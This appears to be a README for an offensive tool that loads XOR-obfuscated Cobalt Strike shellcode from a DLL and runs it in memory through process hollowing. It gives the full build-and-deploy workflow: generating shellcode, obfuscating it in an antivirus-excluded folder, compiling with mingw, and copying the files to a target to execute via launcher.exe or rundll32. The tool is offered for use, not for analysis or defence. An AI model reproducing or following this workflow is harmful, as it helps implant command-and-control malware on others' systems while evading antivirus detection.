A launcher to load a DLL with xored cobalt strike shellcode executed in memory through process hollowing technique
My youtube video on this repo :
- Generate a x64 cobalt strike shellcode with CSSG :
https://github.com/RCStep/CSSG
- Copy your shellcode in obfu.cpp (in "ANTIVIRUS_EXCLUDED_FOLDER" folder) and compile it :
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o obfu.exe obfu.cpp
- Execute obfu.exe, give your own xor secret
- Copy obfuscated-shellcode.cpp content in dll.cpp file and update shellcode char array variable in process hollowing functions
- Compile dll.cpp and launcher.cpp :
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o shellcode.dll -shared dll.cpp
C:\msys64\mingw64\bin\x86_64-w64-mingw32-c++.exe -o launcher.exe launcher.cpp
- Copy launcher.exe, shellcode.dll and the 3 library files on your target and execute launcher.exe or trigger the RunThatShit function with rundll32 :
rundll32 shellcode.dll, RunThatShit
- Enjoy :)
My blog : https://lestutosdeprocessus.fr
My Discord server : https://discord.gg/JJNxV2h